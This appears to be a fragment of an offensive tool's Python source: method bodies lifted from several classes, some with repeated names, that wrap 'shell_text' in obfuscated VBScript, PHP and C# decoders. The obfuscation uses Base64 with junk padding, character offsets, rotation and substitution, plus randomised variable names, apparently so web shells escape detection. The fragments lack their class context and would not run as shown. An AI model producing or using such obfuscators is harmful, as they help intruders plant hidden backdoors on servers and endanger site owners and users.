def RotPlus(self): vbSpecialChars = lambda s: s.replace('"', '""').replace( '\n', '" & chr(10) & "').replace('\t', '" & chr(9) & "') shell_encoded, rows = Encoders(self.Executable( self.shell_text)).Rot90() vals = self.makeVals(shell_encoded) self.vars = [self.makeVars() for _ in range(4)] payload = 'dim ' + self.vars[0] + ', ' + self.vars[ 1] + ', ' + self.vars[2] + '(' + str( rows) + '), ' + self.vars[3] + ', i, r \n' payload += self.vars[1] + ' = ' + str(rows) + ' \n' payload += self.vars[0] + ' = "" \n' payload += ''.join([ self.vars[0] + ' = ' + self.vars[0] + ' & "' + vbSpecialChars(vals[i]) + '" \n' for i in range(len(vals)) ]) payload += 'for i = 0 to (len(' + self.vars[0] + ') / ' + self.vars[ 1] + ') - 1 \n' payload += 'for r = 1 to ' + self.vars[1] + ' : ' payload += self.vars[2] + '(r) = ' + self.vars[ 2] + '(r) & mid(' + self.vars[0] + ', r + i * ' + self.vars[ 1] + ', 1) : next \n' payload += 'next \n' payload += self.vars[3] + ' = trim(join(' + self.vars[2] + ', "")) \n' return payload
def Random(self): vbSpecialChars = lambda s: s.replace('"', '""').replace( '\\\\', '\\').replace('\\n', '" & chr(10) & "').replace( '\\t', '" & chr(9) & "') shell_encoded, cs1, cs2 = Encoders(self.Executable( self.shell_text)).Random() vals = self.makeVals(shell_encoded) self.vars = [self.makeVars() for _ in range(4)] payload = 'dim ' + self.vars[0] + ', ' + self.vars[ 1] + ', ' + self.vars[2] + ', ' + self.vars[3] + ' \n' payload += self.vars[3] + ' = "" \n' payload += self.vars[0] + ' = "" \n' payload += ''.join([ self.vars[0] + ' = ' + self.vars[0] + ' & "' + vbSpecialChars(vals[i].encode('unicode-escape')) + '" \n' for i in range(len(vals)) ]) payload += self.vars[1] + ' = "' + vbSpecialChars( cs2.encode('unicode-escape')) + '" \n' payload += self.vars[2] + ' = "' + vbSpecialChars( cs1.encode('unicode-escape')) + '" \n' payload += 'for i = 1 to len(' + self.vars[0] + ') \n' payload += 'if instr(1, ' + self.vars[2] + ', mid(' + self.vars[ 0] + ', i, 1)) > 0 then ' payload += self.vars[3] + ' = ' + self.vars[3] + ' & mid(' + self.vars[ 2] + ', instr(1, ' + self.vars[1] + ', mid(' + self.vars[ 0] + ', i, 1)), 1) \n' payload += 'if instr(1, ' + self.vars[2] + ', mid(' + self.vars[ 0] + ', i, 1)) = 0 then ' payload += self.vars[3] + ' = ' + self.vars[3] + ' & mid(' + self.vars[ 0] + ', i, 1) \n' payload += 'next \n' return payload
def OrdPlus(self): shell_encoded, ord_plus, chr_join = Encoders(self.shell_text).OrdPlus() vals = self.makeVals(shell_encoded) self.vars = ['$' + self.makeVars() for _ in range(3)] payload = self.vars[2] + ' = ""; \n' payload += self.vars[0] + ' = ""; \n' payload += ''.join( [self.vars[0] + ' .= "' + v + '"; \n' for v in vals]) payload += 'foreach(explode("' + chr_join + '", ' + self.vars[ 0] + ') as ' + self.vars[1] + ') ' payload += self.vars[2] + ' .= chr(' + self.vars[1] + ' - ' + str( ord_plus) + '); \n' return payload
def Base64(self): shell_encoded = Encoders(self.shell_text).Base64() junk = self.makeJunk(shell_encoded, self.an_chars) vals = self.makeVals(shell_encoded, junk) self.vars += [self.makeVars() for _ in range(6)] payload = 'string ' + self.vars[4] + ' = ""; \n' payload += ''.join([ self.vars[4] + ' += "' + vals[i] + '"; \n' for i in range(len(vals)) ]) payload += 'string ' + self.vars[5] + ' = Encoding.UTF8.GetString(' payload += 'Convert.FromBase64String(' + self.vars[ 1] + '.Replace(@"' + junk + '", ""))); \n' return payload
def OrdPlus(self): shell_encoded, ord_plus, chr_join = Encoders(self.shell_text).OrdPlus() vals = self.makeVals(shell_encoded) self.vars = [self.makeVars() for _ in range(7)] payload = 'string ' + self.vars[6] + ' = ""; \n' payload += 'string ' + self.vars[4] + ' = ""; \n' payload += ''.join([ self.vars[4] + ' += "' + vals[i] + '"; \n' for i in range(len(vals)) ]) payload += 'foreach(string ' + self.vars[5] + ' in ' + self.vars[ 4] + '.Split(\'' + chr_join + '\')) { ' payload += self.vars[6] + ' += (char)(Convert.ToInt32(' + self.vars[ 5] + ') - ' + str(ord_plus) + '); } \n' return payload
def Random(self): clean_str = lambda s: s.encode('unicode-escape').replace( '"', '\\"').replace("$", "\\$") shell_encoded, cs1, cs2 = Encoders(self.shell_text).Random() vals = self.makeVals(shell_encoded) self.vars = ['$' + self.makeVars() for _ in range(4)] payload = self.vars[3] + ' = ""; \n' payload += self.vars[0] + ' = ""; \n' payload += ''.join( [self.vars[0] + ' .= "' + clean_str(v) + '"; \n' for v in vals]) payload += self.vars[1] + ' = "' + clean_str(cs1) + '"; \n' payload += self.vars[2] + ' = "' + clean_str(cs2) + '"; \n' payload += 'foreach(str_split(' + self.vars[0] + ') as $c) { ' payload += self.vars[3] + ' .= (strpos(' + self.vars[ 2] + ', $c) === false) ? $c : ' payload += self.vars[1] + '[strpos(' + self.vars[2] + ', $c)]; } \n' return payload
def Base64(self): shell_encoded = Encoders(self.shell_text).Base64() junk = self.makeJunk(shell_encoded + 'base64_decode', self.an_chars) vals = self.makeVals(shell_encoded, junk) self.vars += ['$' + self.makeVars() for _ in range(4)] b64 = junk.join([c for c in '"base64_decode"']) payload = self.vars[0] + ' = ""; \n' payload += ''.join( [self.vars[0] + ' .= "' + v + '"; \n' for v in vals]) payload += self.vars[ 1] + ' = str_replace( "' + junk + '", "", ' + self.vars[ 0] + ' ); \n' payload += self.vars[ 2] + ' = str_replace( "' + junk + '", "", ' + b64 + ' ); \n' payload += self.vars[3] + ' = ' + self.vars[2] + '( ' + self.vars[ 1] + ' ); \n' return payload
def Random(self): clean_str = lambda s: s.encode('unicode-escape').replace('"', '\\"') shell_encoded, cs1, cs2 = Encoders(self.shell_text).Random() vals = self.makeVals(shell_encoded) self.vars = [self.makeVars() for _ in range(8)] payload = 'string ' + self.vars[7] + ' = ""; \n' payload += 'string ' + self.vars[4] + ' = "' + clean_str(cs1) + '"; \n' payload += 'string ' + self.vars[6] + ' = "' + clean_str(cs2) + '"; \n' payload += 'string ' + self.vars[5] + ' = ""; \n' payload += ''.join([ self.vars[5] + ' += "' + clean_str(vals[i]) + '"; \n' for i in range(len(vals)) ]) payload += 'foreach(char c in ' + self.vars[5] + ') { ' payload += self.vars[7] + ' += ' + self.vars[ 6] + '.Contains(c.ToString()) ? ' payload += self.vars[4] + '[' + self.vars[6] + '.IndexOf(c)] : c; } \n' return payload
def OrdPlus(self): shell_encoded, ord_plus, chr_join = Encoders( self.Executable(self.shell_text)).OrdPlus() vals = self.makeVals(shell_encoded) self.vars = [self.makeVars() for _ in range(3)] payload = 'dim ' + self.vars[0] + ', ' + self.vars[ 1] + ', ' + self.vars[2] + ' \n' payload += self.vars[2] + ' = "" \n' payload += self.vars[0] + ' = "" \n' payload += ''.join([ self.vars[0] + ' = ' + self.vars[0] + ' & "' + vals[i] + '" \n' for i in range(len(vals)) ]) payload += 'for each ' + self.vars[1] + ' in split(' + self.vars[ 0] + ', "' + chr_join + '") : ' payload += self.vars[2] + ' = ' + self.vars[2] + ' & chr(' + self.vars[ 1] + ' - ' + str(ord_plus) + ') : next \n' return payload
def Base64(self): shell_encoded = Encoders(self.Executable(self.shell_text)).Base64() junk = self.makeJunk(shell_encoded, self.an_chars) vals = self.makeVals(shell_encoded, junk) self.vars += [self.makeVars() for _ in range(4)] payload = 'dim ' + self.vars[0] + ', ' + self.vars[ 1] + ', ' + self.vars[2] + ', ' + self.vars[3] + ' \n' payload += self.vars[0] + ' = "" \n' payload += ''.join([ self.vars[0] + ' = ' + self.vars[0] + ' & "' + vals[i] + '" \n' for i in range(len(vals)) ]) payload += VBS_B64 + ' \nset ' + self.vars[1] + ' = new Base64 \n' payload += self.vars[2] + ' = Replace( ' + self.vars[ 0] + ', "' + junk + '", "") \n' payload += self.vars[3] + ' = ' + self.vars[ 1] + '.Decode( ' + self.vars[2] + ' ) \n' return payload
def RotPlus(self): clean_str = lambda s: s.encode('unicode-escape').replace('"', '\\"') shell_encoded, rows = Encoders(self.shell_text).Rot90() vals = self.makeVals(shell_encoded) self.vars = [self.makeVars() for _ in range(8)] payload = 'int ' + self.vars[5] + ' = ' + str(rows) + '; \n' payload += 'string[] ' + self.vars[6] + ' = new string[' + str( rows) + ']; \n' payload += 'string ' + self.vars[4] + ' = "" ; \n' payload += ''.join([ self.vars[4] + ' += "' + clean_str(vals[i]) + '"; \n' for i in range(len(vals)) ]) payload += 'for(int i = 0; i < ' + self.vars[ 4] + '.Length / ' + self.vars[5] + '; i++) ' payload += '{ for(int r = 0; r < ' + self.vars[5] + '; r++) ' payload += self.vars[6] + '[r] += ' + self.vars[ 4] + '[r + i * ' + self.vars[5] + ']; } \n' payload += 'string ' + self.vars[ 7] + ' = String.Join("", ' + self.vars[6] + ').Trim(); \n' return payload
def RotPlus(self): clean_str = lambda s: s.encode('unicode-escape').replace( '"', '\\"').replace("$", "\\$") shell_encoded, rows = Encoders(self.shell_text).Rot90() vals = self.makeVals(shell_encoded) self.vars = ['$' + self.makeVars() for _ in range(4)] payload = self.vars[1] + ' = ' + str(rows) + '; \n' payload += self.vars[2] + ' = array(); \n' payload += self.vars[0] + ' = "" ; \n' payload += ''.join( [self.vars[0] + ' .= "' + clean_str(v) + '"; \n' for v in vals]) payload += 'for($i = 0; $i < ' + self.vars[1] + '; $i++) ' + self.vars[ 2] + '[] = ""; \n' payload += 'for($i = 0; $i < (strlen(' + self.vars[ 0] + ') / ' + self.vars[1] + '); $i++) ' payload += '{ for($r = 0; $r < ' + self.vars[1] + '; $r++) ' payload += self.vars[2] + '[$r] .= ' + self.vars[ 0] + '[$r + $i * ' + self.vars[1] + ']; } \n' payload += self.vars[3] + ' = trim(implode("", ' + self.vars[ 2] + ')); \n' return payload